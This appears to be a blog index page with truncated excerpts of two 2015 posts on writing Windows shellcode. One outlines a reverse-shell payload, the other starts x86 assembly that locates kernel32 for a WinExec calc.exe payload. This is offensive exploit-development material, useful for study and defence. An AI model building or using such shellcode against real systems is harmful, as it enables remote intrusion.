420blazeit

Windows reverse shell universal shellcode

Written by  on August 29, 2015

Here it goes: 1) resolve needed functions from kernel 32 and push them on the stack 2) load & initialize winsock library 3) create a socket and connect[...]

WinExec calc.exe universal shellcode

Written by  on August 21, 2015

ASM: PUSH ESI ; LOCATE KERNEL32 BASE ADDR XOR EAX,EAX MOV EAX,DWORD PTR FS:[EAX+30] MOV EAX,DWORD PTR DS:[EAX+C] MOV ESI,DWORD PTR DS:[EAX+1C] LODS DWORD[...]